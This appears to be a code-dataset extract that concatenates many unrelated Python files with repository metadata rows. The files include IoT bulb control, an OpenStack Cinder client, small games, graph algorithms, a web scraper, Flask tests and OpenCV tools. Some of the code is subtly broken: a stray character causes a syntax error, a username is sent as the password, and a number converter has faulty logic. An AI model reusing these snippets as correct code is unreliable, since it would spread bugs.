object_id_bulb = os.getenv("object_id_bulb")
if ip is None:
raise RuntimeError("Undefined environment variable `raspi_ip`")
if object_id_bulb is None:
raise RuntimeError("Undefined environment variable `object_id_bulb`")
url = 'http://' + ip + ":9997/agent/remote/objects/" + object_id_bulb + "/properties/Bulb2_Color"
headers = {
'Content-Type': 'application/json',
'infrastructure-id': 'VAS',
'adapter-id': 'HackathonSampleService'
}
data = "{value:'" + str(h) + "," + str(s) + "," + str(v) + "'}"
r = requests.put(url=url, data=data, headers=headers)
def flash_bulb_color():
"""
Flashes the current color. Set the color with `set_bulb_color`.
"""
ip = os.getenv("raspi_ip")
object_id_bulb = os.getenv("object_id_bulb")
if ip is None:
raise RuntimeError("Undefined environment variable `raspi_ip`")
if object_id_bulb is None:
raise RuntimeError("Undefined environment variable `object_id_bulb`")
url = 'http://' + ip + ":9997/agent/remote/objects/" + object_id_bulb + "/properties/Bulb2_Alert"
headers = {
'Content-Type': 'application/json',
'infrastructure-id': 'VAS',
'adapter-id': 'HackathonSampleService'
}
data = "{value:'LSELECT'}"
r = requests.put(url=url, data=data, headers=headers)
def bulb_set_disabled_status():
set_bulb_color(0.6*255, 0, 0)
def bulb_set_parcel_status():
set_bulb_color(0.6*255, 100, 50)
flash_bulb_color()
def bulb_set_security_status():
set_bulb_color(0, 100, 10)
flash_bulb_color()
| true |
d991eb857e5c5fbe977540b6f9b9e2821d4b0c46 | Python | MrHamdulay/csc3-capstone | /examples/data/Assignment_4/lphrof001/ndom.py | UTF-8 | 1,204 | 2.9375 | 3 | [] | no_license | def ndom_to_decimal(a):
a=str(a)
if len(a)==3:
t=a[0]
u=a[1]
v=a[2]
w=int(t)
x=int(u)
y=int(v)
return(w*36+x*6+y*1)
elif len(a)==2:
p=a[0]
q=a[1]
r=int(p)
s=int(q)
return(r*6+s*1)
if len(a)==1:
b=a[0]
c=int(b)
return(c*1)
def decimal_to_ndom(a):
b=str(a)
if a<6:
print(a)
elif a>6:
if len(b)==3:
g=str(a//36)
v=(a%36)
h=str(v//6)
j=str(a%6)
k=int(g+h+j)
return k
if len(b)==2:
g=str(a//36)
v=(a%36)
h=str(v//6)
e=str(a%6)
f=int(g+h+e)
return f
if len(b)==1:
x=int(a)
return a
def ndom_add(a,b):
ri=int(ndom_to_decimal(a))
ro=int(ndom_to_decimal(b))
x=ri+ro
y=decimal_to_ndom(x)
return y
def ndom_multiply(a,b):
ra=int(ndom_to_decimal(a))
re=int(ndom_to_decimal(b))
l=ra*re
q=decimal_to_ndom(l)
return q
| true |
028272657a28a56865be5a41ff85042bf50fd928 | Python | pikamar/container-form | /app/test/api.py | UTF-8 | 1,185 | 3.015625 | 3 | [] | no_license | import json
import requests
url = 'http://0.0.0.0:5000/api/data'
headers = {'Accept': 'application/json'}
post_headers = {'Accept': 'application/json',
'Content-Type': 'application/json'}
# Make a POST request to create an object in the database.
data = {
'status': 'active'
}
print(json.dumps(data))
response = requests.post(url, data=json.dumps(data), headers=post_headers)
assert response.status_code == 201
# Make a GET request for the entire collection.
response = requests.get(url, headers=headers)
assert response.status_code == 200
print(response.json())
# Make a GET request for an individual instance of the model.
response = requests.get(url + '/1', headers=headers)
assert response.status_code == 200
print(response.json())
# Use query parameters to make a search. `requests.get` doesn't like
# arbitrary query parameters, so be sure that you pass a dictionary
# whose values are strings to the keyword argument `params`.
#filters = [dict(name='name', op='like', val='%y%')]
#params = {'filter[objects]': json.dumps(filters)}
#response = requests.get(url, params=params, headers=headers)
#assert response.status_code == 200
#print(response.json()) | true |
288cc0936a05a60382c25476ce7ad4669fbf5db8 | Python | yakhira/conversation-bot | /Allison/conversation_bot/watson_tone_analizer.py | UTF-8 | 792 | 2.53125 | 3 | [] | no_license | from watson_developer_cloud import ToneAnalyzerV3
class watson_tone_analizer(object):
"""Tone analizer by IBM Watson"""
def __init__(self, username, password, version="2016-05-19"):
self.username = username
self.password = password
self.version = version
def tone_analizer(self, text):
"""Send to IBM tone analizer service"""
tone = None
toneanalizer = ToneAnalyzerV3(
username=self.username,
password=self.password,
version=self.version
)
response = toneanalizer.tone(
text=text
)
for tone in response["document_tone"]["tone_categories"][0]["tones"]:
if tone["score"] > 0.5:
tone = tone["tone_name"]
return tone
| true |
ee70a30c09ccc35bbfd756468550a031f9acc506 | Python | rushiagr/myutils | /archive/openstack_api.py | UTF-8 | 15,351 | 2.6875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/python
import httplib
import json
class API(object):
"""API object to connect to an OpenStack environment."""
def __init__(self, osurl=None, osuser=None, ospassword=None):
self.url = osurl or "10.63.165.20"
self.osuser = osuser or "demo"
self.ospassword = ospassword or "nova"
self.tenant_id = None
self.default_header = {"Content-Type": "application/json"}
self.keystone_host = self.url + ":5000"
self.cinder_host = self.url + ":8776"
self.tenant_id = self.get_tenant_id_for_user()
self.token = self.get_token()
def send_request(self, request_type, host, url, params=None, headers=None):
"""
Sends the request with provided parameters and returns back the
data returned from the request (if any).
"""
if isinstance(params, dict):
params = json.dumps(params)
conn = httplib.HTTPConnection(host)
conn.set_debuglevel(1)
conn.request(request_type, url, params, headers or self.default_header)
if request_type == "DELETE":
return
response = conn.getresponse()
data = response.read()
datadict = json.loads(data)
conn.close()
return datadict
def get_post_data(self, host, url, params, headers=None):
"""
Get data for a POST request.
:param host: e.g. '10.10.0.110:5000'
:param url: e.g. '/v1/tokens'
:param params: Stringified parameter dict
:param headers: Headers dict, e.g. {"X-Auth-Token":"blah"}
"""
if isinstance(params, dict):
params = json.dumps(params)
conn = httplib.HTTPConnection(host)
conn.set_debuglevel(1)
conn.request("POST", url, params, headers or self.default_header)
response = conn.getresponse()
data = response.read()
datadict = json.loads(data)
conn.close()
return datadict
def get_get_data(self, host, url, headers=None):
"""
Get data for a GET request.
:param host: e.g. '10.10.0.110:5000'
:param url: e.g. '/v1/tokens'
:param headers: Headers dict, e.g. {"X-Auth-Token":"blah"}
"""
conn = httplib.HTTPConnection(host)
conn.set_debuglevel(1)
print 'get called. headers: ', headers or self.default_header
conn.request("GET", url, None, headers or self.default_header)
response = conn.getresponse()
data = response.read()
print 'data', data
datadict = json.loads(data)
conn.close()
return datadict
def get_tenant_id_for_user(self, user=None, password=None):
"""
The method first queries keystone and gets a small token to get the
tenant ID, and then uses this tenant ID to generate a full PKI token.
"""
# Get token to query tenant ID
param_dict = {
"auth": {
"passwordCredentials": {
"username": user or self.osuser,
"password": user or self.ospassword
}
}
}
params = json.dumps(param_dict)
datadict = self.get_post_data(self.keystone_host,
"/v2.0/tokens",
params,
self.default_header)
tenant_id_token = datadict['access']['token']['id']
# Now get the tenant ID
header = {"X-Auth-Token": tenant_id_token}
datadict = self.get_get_data(self.keystone_host,
"/v2.0/tenants",
header)
for tenant_dict in datadict['tenants']:
if tenant_dict['name'] == (user or self.osuser):
print 'tenant_name:', tenant_dict['name'], 'tenant_id', tenant_dict['id']
return str(tenant_dict['id'])
raise
def get_token(self):
"""
Returns the token for the given {osuser,ospassword,tenant_id} tuple.
"""
auth_string = {
"auth" : {
"passwordCredentials": {
"username": self.osuser,
"password": self.ospassword
},
"tenantId": self.tenant_id
}
}
params = json.dumps(auth_string)
headers = {"Content-Type": "application/json"}
conn = httplib.HTTPConnection(self.keystone_host)
conn.request("POST", "/v2.0/tokens", params, headers)
# HTTP response
response = conn.getresponse()
data = response.read()
datadict = json.loads(data)
conn.close()
token = datadict['access']['token']['id']
return str(token)
# All the cinder volume functions
def cinder_create(self, size):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"volume": {"size": size}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/volumes' % self.tenant_id,
params,
headers)
return data
# def cinder_share_create(self, size, proto):
# headers = self.default_header
# headers["X-Auth-Token"] = self.token
# params = {"share": {"size": size,
# "share_type": proto}}
# data = self.get_post_data(self.cinder_host,
# '/v1/%s/shares' % self.tenant_id,
# params,
# headers)
# return data
def cinder_list(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v1/%s/volumes' % self.tenant_id,
headers)
return data
def cinder_list_detail(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v1/%s/volumes/detail' % self.tenant_id,
headers)
return data
def cinder_list_v2(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v2/%s/volumes' % self.tenant_id,
headers)
return data
def cinder_list_detail_v2(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v2/%s/volumes/detail' % self.tenant_id,
headers)
return data
def cinder_snapshot_list(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v2/%s/snapshots' % self.tenant_id,
headers)
return data
# def cinder_share_list(self):
# headers = self.default_header
# headers["X-Auth-Token"] = self.token
# data = self.get_get_data(self.cinder_host,
# '/v1/%s/shares' % self.tenant_id,
# headers)
# return data
def cinder_delete(self, vol_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.send_request("DELETE",
self.cinder_host,
'/v1/%s/volumes/%s' % (self.tenant_id,
vol_id))
return data
def cinder_delete_all(self):
"""
Deletes all the volumes present in Cinder. As of this version,
it tries to delete the volumes which are not in 'available' and
'error' states too.
"""
list_data = self.cinder_list()
volumes = list_data['volumes']
volume_ids = []
for volume in volumes:
volume_ids.append(str(volume['id']))
for volume_id in volume_ids:
self.cinder_delete(volume_id)
print "successfully deleted all volumes"
return
def cinder_create_many(self, vol_number, vol_sizes=[1]):
"""
Creates volumes equal to :vol_number: with sizes as per list
:vol_sizes:. If there are more volumes than elements in list
:vol_sizes:, a default value of 1GB will be used.
"""
if vol_number > len(vol_sizes):
vol_sizes.extend([1]*(vol_number-len(vol_sizes)))
for vol_index in range(vol_number):
self.cinder_create(vol_sizes[vol_index])
# All the cinder SHARE functions
def cinder_share_create(self, size, proto):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"share": {"size": size,
"share_type": proto}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/shares' % self.tenant_id,
params,
headers)
return data
def cinder_share_allow(self, share_id, access_type, access_to):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"os-allow_access": {"access_type": access_type,
"access_to": access_to}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/shares/%s/action' % (self.tenant_id,share_id),
params,
headers)
return data
def cinder_share_deny(self, share_id, access_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"os-deny_access": {"access_id": access_id}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/shares/%s/action' % (self.tenant_id,share_id),
params,
headers)
return data
def cinder_share_access_list(self, share_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"os-access_list": None}
data = self.get_post_data(self.cinder_host,
'/v1/%s/shares/%s/action' % (self.tenant_id,share_id),
params,
headers)
return data
#TODO(rushiagr): merge this def into the above one
def cinder_share_create_from_snapshot(self, size, proto, snap_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"share": {"size": size,
"share_type": proto,
"share_id": snap_id}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/shares' % self.tenant_id,
params,
headers)
return data
def cinder_share_list(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v1/%s/shares' % self.tenant_id,
headers)
return data
def cinder_share_snapshot_list(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v1/%s/share-snapshots' % self.tenant_id,
headers)
return data
def cinder_share_show(self, share_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v1/%s/shares/%s' % (self.tenant_id, share_id),
headers)
return data
def cinder_share_list_detail(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v1/%s/shares/detail' % self.tenant_id,
headers)
return data
def cinder_share_delete(self, vol_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.send_request("DELETE",
self.cinder_host,
'/v1/%s/shares/%s' % (self.tenant_id,
vol_id))
return data
def cinder_share_snapshot_create(self, shr_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"share-snapshot": {"share_id": shr_id,
#"display_name": "timepass_name"
}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/share-snapshots' % self.tenant_id,
params,
headers)
return data
def cinder_share_snapshot_delete(self, shr_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"share-snapshot": {"share_id": shr_id,
#"display_name": "timepass_name"
}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/share-snapshots' % self.tenant_id,
params,
headers)
return data
def cinder_share_delete_all(self):
"""
Deletes all the volumes present in Cinder. As of this version,
it tries to delete the volumes which are not in 'available' and
'error' states too.
"""
list_data = self.cinder_share_list()
shares = list_data['shares']
share_ids = []
for share in shares:
share_ids.append(str(share['id']))
for share_id in share_ids:
self.cinder_share_delete(share_id)
print "successfully deleted all volumes"
return
def cinder_share_create_many(self, vol_number, vol_sizes=[1]):
"""
Creates volumes equal to :vol_number: with sizes as per list
:vol_sizes:. If there are more volumes than elements in list
:vol_sizes:, a default value of 1GB will be used.
"""
if vol_number > len(vol_sizes):
vol_sizes.extend([1]*(vol_number-len(vol_sizes)))
for vol_index in range(vol_number):
self.cinder_create(vol_sizes[vol_index])
if __name__ == '__main__':
a = API() | true |
1fca490f63d02dc921728dd22f0a01eeb2927ae8 | Python | mpostaire/deathstick | /turret.py | UTF-8 | 3,276 | 2.875 | 3 | [] | no_license | import string
import random
import time
import cocos
from cocos.text import Label
import cocos.euclid as eu
import cocos.collision_model
from projectile import Projectile
import cocos.euclid as eu
def predict_pos(vec_orig, speed_mag, vec_pos, vec_dir, delta, epsilon):
diff_old, diff = None, None
delta = delta/2
old_pos = vec_pos
while diff is None or diff_old is None or ((diff - diff_old) > epsilon):
diff_old = diff
#print(vec_pos.magnitude())
delta = delta + 1
#compute next target's pos
old_pos = vec_pos
vec_pos = vec_pos + delta * vec_dir
#compute vector of aim
orig_dir = (vec_pos - vec_orig).normalize() * speed_mag
#compute next proj pos
vec_orig = vec_orig + delta * orig_dir
diff = (vec_orig - vec_pos).magnitude()
if diff_old is not None and diff > diff_old:
return old_pos
return vec_pos
MAX_LEVEL = 10
class Turret():
def __init__(self, pos, delay, dist, speed, ammo_type, bullet_len, level):
self.pos = eu.Vector2(pos[0], pos[1])
self.delay = delay
self.dist = dist
self.bullet_len = bullet_len
self.speed = speed
self.timer = delay
self.level = level
self.ammo_type = ammo_type# shape (characters) of the ammunitions
self.projectiles = [] #all the bullets it shot that are still alive
self.vec_player = None #a temporary variable used for inner computation
self.bullet_count = 0
def activate(self, layer, player):
#the zero indexing is used to pass raw reference wrapped inside an array
#dirty and hacky but it works just fine :)
self.player = player[0]
self.layer = layer[0]
def update(self, delta):
#update the logic of the turrets according to the delta time ellapsed
self.vec_player = eu.Vector2(self.player.x, self.player.y)
#diff is the vector between the player and the turret
diff = next_ppos = predict_pos(
self.pos,
self.speed,
self.vec_player,
self.player.vec_speed,
delta,
5.0
) - self.pos
self.timer -= delta#used to implement firing speed
#check if the player is close enough
if self.timer <= 0 and diff.magnitude() < self.dist:
if self.bullet_count < self.level:
self.shoot(diff, delta) #needs to be passed because we need the direction
else:
self.shoot(self.vec_player - self.pos, delta) #needs to be passed because we need the direction
global MAX_LEVEL
self.bullet_count = (self.bullet_count + 1) % MAX_LEVEL
self.timer = self.delay
for proj in self.projectiles:
proj.update(delta)
def shoot(self, diff, delta):
#spawns a bullet and adds it to the layer
proj = Projectile(
[self.pos.x, self.pos.y],
self.vec_player.angle(eu.Vector2(1, 0)),
[self.layer],
diff,
self.speed,
self.bullet_len,
self.ammo_type
)
proj.turret = self
self.projectiles.append(proj)
self.layer.add(proj)
| true |
7d6d185d3623e95768681df4926fc1ecc76476a2 | Python | kiram15/cs320 | /Prims/kruskal_mst_reference_implementation.py | UTF-8 | 1,707 | 3.328125 | 3 | [] | no_license | from undirected_graph import Graph
def initialize_disjoint_set(items):
return {item: None for item in items}
def canonical_item(ds, item):
path = [item]
parent = ds[path[-1]]
while parent:
path.append(parent)
parent = ds[path[-1]]
for i in path[:-1]:
ds[i] = path[-1]
return path[-1]
def same_set(ds, item1, item2):
c1 = canonical_item(ds, item1)
c2 = canonical_item(ds, item2)
return c1 == c2
def merge_sets(ds, item1, item2):
c1 = canonical_item(ds, item1)
c2 = canonical_item(ds, item2)
ds[c1] = c2
def read_weighted_undirected_graph(filename):
g = Graph()
with open(filename) as f:
for line in f:
try:
v1, v2, w = line.split()
g.add_edge(v1, v2, {'weight': int(w)})
except:
pass
return g
def write_tree_edges_to_file(edges, filename):
with open(filename, mode='w') as f:
for v1, v2, w in edges:
f.write("{} {} {}\n".format(v1, v2, w))
def compute_mst(filename):
g = read_weighted_undirected_graph(filename)
node_sets = initialize_disjoint_set(g.get_nodes())
node_count = len(node_sets)
edges = [(g.attributes_of(v, u)['weight'], v, u) for u,v in g.get_edges()]
edges.sort()
tree_edges = []
for weight, v, u in edges:
if not same_set(node_sets, v, u):
tree_edges.append((v, u, weight))
merge_sets(node_sets, v, u)
if len(tree_edges) == node_count - 1:
break
write_tree_edges_to_file(tree_edges, filename + '.kruskal.mst')
if __name__ == "__main__":
import sys
filename = sys.argv[1]
compute_mst(filename)
| true |
93f6626e6e72b43a195b2373546221693490aeef | Python | me13tz/Linux_folder | /yahooWeather.py | UTF-8 | 731 | 3.609375 | 4 | [] | no_license | #!/home/USERNAME/anaconda3/bin/python3.4
import requests, bs4
###download the weather report from Yahoo
res = requests.get('https://weather.yahoo.com/united-states/washington/seattle-12798961/')
if res.status_code != requests.codes.ok:
print("May want to try downloading again - there was a problem.")
exit()
###create a BeautifulSoup object and search for pertinent elements, assign variables
wSoup = bs4.BeautifulSoup(res.text)
p_tags = wSoup.select('p')
today = str(p_tags[0])
tomorrow = str(p_tags[1])
span = wSoup.select('div span')
x = str(span[8])
print()
###slice and dice for clean output
print("Current temperature: "+x[34:36]+"\n")
print("From Yahoo Weather:\n"+today[16:-4]+"\n")
print(tomorrow[16:-4]+"\n")
| true |
1eb7373553834aebbb3d8e7326f55c09f4da2791 | Python | jlh040/SQLAlchemy-Blogly-app | /tests.py | UTF-8 | 4,048 | 2.75 | 3 | [] | no_license | from unittest import TestCase
from app import app
from models import db, User, Post
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///blogly_test_db'
app.config['SQLALCHEMY_ECHO'] = False
app.config['TESTING'] = True
app.config['DEBUG_TB_HOSTS'] = ['dont-show-debugging-toolbar']
db.drop_all()
db.create_all()
class BloglyRouteTestCase(TestCase):
"""Test some of the routes in the main app file."""
def setUp(self):
"""Clear out the database and add sample users."""
Post.query.delete()
User.query.delete()
user_1 = User(first_name = 'Mark', last_name = "Hammond")
user_2 = User(first_name = 'Sally', last_name = "Witherspoon")
db.session.add(user_1)
db.session.add(user_2)
db.session.commit()
self.user_id_1 = user_1.id
self.user_id_2 = user_2.id
def tearDown(self):
"""Clear out the session."""
db.session.rollback()
def test_show_all_users(self):
"""Test that the users appear on the page."""
with app.test_client() as client:
resp = client.get('/users')
html = resp.get_data(as_text=True)
self.assertIn('Mark Hammond', html)
self.assertIn('Sally Witherspoon', html)
def test_create_user(self):
"""Test that a new user is created."""
new_user = {'first-name': 'Jack', 'last-name': 'Skellington'}
with app.test_client() as client:
resp = client.post('/users/new', data=new_user, follow_redirects=True)
html = resp.get_data(as_text=True)
self.assertIn('Jack Skellington', html)
def test_homepage_redirect(self):
"""Test that the '/' route is actually redirected."""
with app.test_client() as client:
resp = client.get('/')
self.assertEqual(resp.status_code, 302)
def test_delete_user(self):
"""Test that a user can be deleted."""
with app.test_client() as client:
# delete user 1
resp = client.post(f'/users/{self.user_id_1}/delete', follow_redirects=True)
# get user 2 from the database
user_2 = User.query.filter(User.id == self.user_id_2).one()
# make a request for all the users in the database
req_for_all_users = User.query.all()
# check that user 2 is the only one in the database
self.assertEqual(req_for_all_users, [user_2])
def test_post_creation(self):
"""Test that a post is created."""
with app.test_client() as client:
# Make a post
resp_1 = client.post(f'/users/{self.user_id_2}/posts/new', data = {'title': 'My first post',
'content': 'This is the content of my first post'}, follow_redirects = True)
# Get that post
user = User.query.get(self.user_id_2)
post = user.posts[0]
# Go to the page for that post
resp_2 = client.get(f'/posts/{post.id}')
html = resp_2.get_data(as_text = True)
# Check that the expected text is on that post's page
self.assertIn('My first post', html)
self.assertIn('This is the content of my first post', html)
def test_post_deletion(self):
"""Test that a post can be deleted."""
with app.test_client() as client:
# Make a post
resp = client.post(f'/users/{self.user_id_1}/posts/new', data = {'title': 'This is yet another post',
'content': 'Welcome to my beautiful post.'}, follow_redirects = True)
# Get the post id
post_id = Post.query.filter(Post.user_id == self.user_id_1).one().id
# Delete the post
client.post(f'/posts/{post_id}/delete', follow_redirects = True)
# Check that the post is gone
resp_2 = client.get(f'/users/{self.user_id_1}')
html = resp_2.get_data(as_text = True)
self.assertNotIn('This is yet another post', html) | true |
bde78a4c974e13d854f32ef45423cc476e96523a | Python | sswietlik/helloPython | /nr07_Petle/nr07_DebuggowanieSkryptu_LAB.py | UTF-8 | 327 | 3.921875 | 4 | [] | no_license | print('Zad 1')
number = 1
previus_number = 0
while number < 50:
print(number + previus_number)
previus_number = number
number = number + 1
print()
print('Zad 2')
print()
text = ''
number = 10
condition = True
while condition:
text += 'x'
print(text)
if len(text) > number:
condition = False | true |
84eb88b3ad655a6d227b629f6226850ff335721d | Python | sciftcigit/DERS-ORNEKLER-PYTHON-I-2020 | /scope-global.py | UTF-8 | 507 | 3.796875 | 4 | [] | no_license | # en üste tanımladığım değişken global scope alanında
# böyle olduğu için hem def hemde ana kod bloğu kısmından erişebildik.
surum = "Surum 3.5"
def selamla(isim) :
ad = isim
global x # global kelimesi ile de global bir değişken oluşturabilirsiniz.
x = 5555
print(ad + " hoşgeldiniz.")
print("Sürüm :" + surum) # surum değişkenine erişiyoruz
selamla("Ayşe")
print("Yazılım sürümü :" + surum) # surum değişkenine erişiyoruz
print(x)
| true |
f1380e308bf8026151814ed933cd553a168c37f3 | Python | Bannonsmith/Assignment-1 | /grocery_app.py | UTF-8 | 2,761 | 4.3125 | 4 | [] | no_license | user_input = ""
print("Grocery App")
# Ask user for the input
#input_1 = input("Which store would you like to go to?")
#input_2 = input("brief description")
#Create shopping list- with title and description
user_input = ""
store_list = []
total = 0
class Grocery:
def __init__(self, name, quantity, price, total):
self.name = name
self.quantity = quantity
self.price = price
self.total = total
class StoreList:
def __init__(self, name, description):
self.name = name
self.description = description
self.grocery_items = []
def show_menu():
print("Press 1 to add new shopping list")
print("Press 2 to delete shopping list")
print("Press 3 to view all shopping list")
print("Press 4 to add to grocery item to shopping list")
print("Print q to quit")
def add_shopping_list():
name = input("Which store would you like to go to? ")
description = input("brief description ")
store = StoreList(name,description)
store_list.append(store)
show_menu()
def add_grocery_item():
view_shopping_list()
store_list_number = int(input("Enter shopping list number to add the grocery item: "))
store_lists = store_list[store_list_number - 1]
name = input("What item would you like to add ")
quantity = float(input("How many {} would you like ".format(name)))
price = float(input("What is the price? "))
total = quantity * price
grocery = Grocery(name,quantity,price,total)
store_lists.grocery_items.append(grocery)
def view_shopping_list():
for index in range(0,len(store_list)):
store = store_list[index]
print(f"{index + 1} - {store.name} - {store.description}")
for grocery in store.grocery_items:
print(f"item - {grocery.name} quantity-{grocery.quantity} each worth ${grocery.price}")
print(f"Your total cost for those item/items: {grocery.total}")
for amount in grocery.total:
print("Your final bill: {}").format(sum(amount))
#store_list = StoreList(store, description, grocery)
#grocery = Grocery(name, quantity, price)
show_menu()
try:
while user_input != "q":
user_input = input("Enter your choice: ")
if user_input == "1":
add_shopping_list()
elif user_input == "2":
delete_shopping_list()
elif user_input == "3":
view_shopping_list()
elif user_input == "4":
add_grocery_item()
except ValueError:
print("Please input from the selection above")
# The user shoule be able to add multiple shopping list
# Give user option to display that list
# User can add a grocery item to list- with title
# use format in schoology to print it out
| true |
006db5553b86bd5eb5d41dadd9cedad3f36f4722 | Python | chengrenjiecrj/PythonLianxi | /copyPro/FreeMemory.py | UTF-8 | 783 | 3.25 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding:utf8 -*-
# @Time : 2017/11/30 14:25
# @Author : hantong
# @File : count_free_memory.py
#统计linux系统空闲内存和所有内存
with open('/proc/meminfo') as fd:
for line in fd:
if line.startswith('MemTotal'):
#startswith是以。。。开头的字符串,上面表示以MemTotal开头的字符串
total = line.split()[1]
#split切片,上面表示下标1的字符串
continue
if line.startswith('MemFree'):
free = line.split()[1]
break
TotalMem = int(total)/1024000.0
#此处除以1024000,换算下来是GB
FreeMem = int(free)/1024000.0
print('Free Memory = '+"%.2f" % FreeMem +'G')
#%.2f表示保留两位小数
print('Total Memory = '+"%.2f" % TotalMem +'G') | true |
cb6eca75ad2524685edcf359898cfb7401a26c45 | Python | Mabynar/DandyBot | /game/Players/Player.py | UTF-8 | 1,700 | 3.171875 | 3 | [
"MIT"
] | permissive | from Constants import *
class Player:
def __init__(self, game, name, tile):
self.game = game
self.name = name
self.tile = tile
self.x, self.y = 0, 0
self.gold = 0
self.keys = 0
def act(self, cmd):
if cmd == PASS: return
dx, dy = 0, 0
if cmd == TAKE:
self.take()
elif cmd == UP:
dy -= 1
elif cmd == DOWN:
dy += 1
elif cmd == LEFT:
dx -= 1
elif cmd == RIGHT:
dx += 1
self.move(dx, dy)
def move(self, dx, dy):
if dx or dy:
x, y = self.x + dx, self.y + dy
game = self.game
game.remove_player(self)
if not game.check(WALL, x, y) and not game.check(PLAYER, x, y) and ((not game.check(DOOR, x, y)) | self.keys):
self.x, self.y = x, y
game.add_player(self, self.x, self.y)
def take(self):
gold = self.game.check(GOLD, self.x, self.y)
if gold:
self.gold += gold
self.game.take_item(self.x, self.y)
key = self.game.check(KEY, self.x, self.y)
if key:
self.keys += 1
self.game.take_item(self.x, self.y)
portal = self.game.check(PORTAL, self.x, self.y)
if portal:
portals = [];
for i in range(self.game.cols):
for j in range(self.game.rows):
if (self.game.map[i][j] == '?') and (not (i == self.x & j == self.y)):
portals.append((j,i));
self.x, self.y = random.choice(portals);
def newlevel(self):
self.gold = 0
self.keys = 0 | true |
95354f8c9583d4a4e6ad93cf80ccea3ab00f15f1 | Python | RajjatKumare1606/Angle-detect | /AngleFinder.py | UTF-8 | 1,036 | 2.8125 | 3 | [
"Unlicense"
] | permissive | import cv2
import math
path = 'text1.jpg'
img = cv2.imread(path)
pointsList = []
def mousePoint(event,x,y,flags,params):
if event == cv2.EVENT_LBUTTONDOWN:
size = len(pointsList)
if size != 0 and size % 3 != 0:
cv2.line(img,tuple(pointsList[round((size-1)/3)*3]),(x,y),(0,0,255),2)
cv2.circle(img,(x,y),5,(0,0,255),cv2.FILLED)
pointsList.append([x,y])
def gradient(pt1,pt2):
return(pt2[1]-pt1[1])/(pt2[0]-pt1[0])
def getAngle(pointsList):
pt1, pt2, pt3 = pointsList[-3:]
m1 = gradient(pt1,pt2)
m2 = gradient(pt1,pt3)
angR = math.atan((m2-m1)/(1+(m2*m1)))q
angD = round(math.degrees(angR))
cv2.putText(img,str(angD),(pt1[0]-40,pt1[1]-20),cv2.FONT_HERSHEY_COMPLEX, 1.5,(0,0,255),2)
while True:
if len(pointsList) % 3 == 0 and len(pointsList) !=0:
getAngle(pointsList)
cv2.imshow('Image',img)
cv2.setMouseCallback('Image',mousePoint)
if cv2.waitKey(1) & 0xFF == ord('q'):
pointsList = []
img = cv2.imread(path)
| true |
dcbecc74e41811a8e3bee3bf9afeb3e90b25ae6c | Python | Zen-Master-SoSo/legame | /callout.py | UTF-8 | 1,120 | 3.3125 | 3 | [] | no_license | """ Provides the Callout class, a Sprite used during development to provide debug
information positioned near another animated sprite. """
from pygame import Rect, Surface
from pygame.sprite import Sprite
class Callout(Sprite):
def __init__(self, sprite, group, font):
Sprite.__init__(self, group)
self.sprite = sprite
self.rect = Rect((sprite.rect.right, sprite.rect.bottom, 0, 0))
self.image = Surface((0, 0))
self.font = font
self.empty()
def empty(self):
self.texts = []
self.rect.width = 0
def write(self, text, color=(255, 255, 255)):
self.texts.append(self.font.render(text, True, color))
width, height = self.font.size(text)
if width > self.rect.width:
self.rect.width = width
self.rect.height += height
def update(self):
self.rect.left = self.sprite.rect.right
self.rect.top = self.sprite.rect.bottom
self.image = Surface((self.rect.width, self.rect.height))
self.image.set_colorkey((0,0,0))
self.image.fill((0,0,0))
line_height = self.font.get_linesize()
y = 0
for s in self.texts:
self.image.blit(s, (0, y))
y += line_height
self.rect.height = y
| true |
dff89387cc8dd54a3cfc547c8e4bd4f7eab3841c | Python | Kooki-eByte/Teaching-Python | /09_Walrus_Expression/example.py | UTF-8 | 411 | 3.21875 | 3 | [
"MIT"
] | permissive | # The Walrus operator :=
request = {
"form": {
"username": "Cristian",
"password": "iLovePython"
}
}
db = []
def process_form(req):
# password = req["form"].get("password")
if len(password := req["form"].get("password")) > 5:
db.append(password)
return "User Added!"
else:
return "Password is too short!"
print(process_form(request))
print(db)
| true |
c28e767b778e0d3822c0cf48a15c3a69ab88a418 | Python | WeiFeiLong/exam | /58_1.py | UTF-8 | 385 | 3.015625 | 3 | [] | no_license | def gettwo(s):
a = {}
b = []
for x in range(len(s)):
if a.__contains__(s[x:x + 2]):
a[s[x:x + 2]] += 1
else:
a[s[x:x + 2]] = 1
a = sorted(a.items(), key=lambda x: x[1])[::-1]
for x in range(len(a)):
if a[x][1] == a[0][1]:
b.append(a[x][0])
return b
s = 'qewqewrdsafdsfdsgrfgdgfdcx'
print(gettwo(s)) | true |
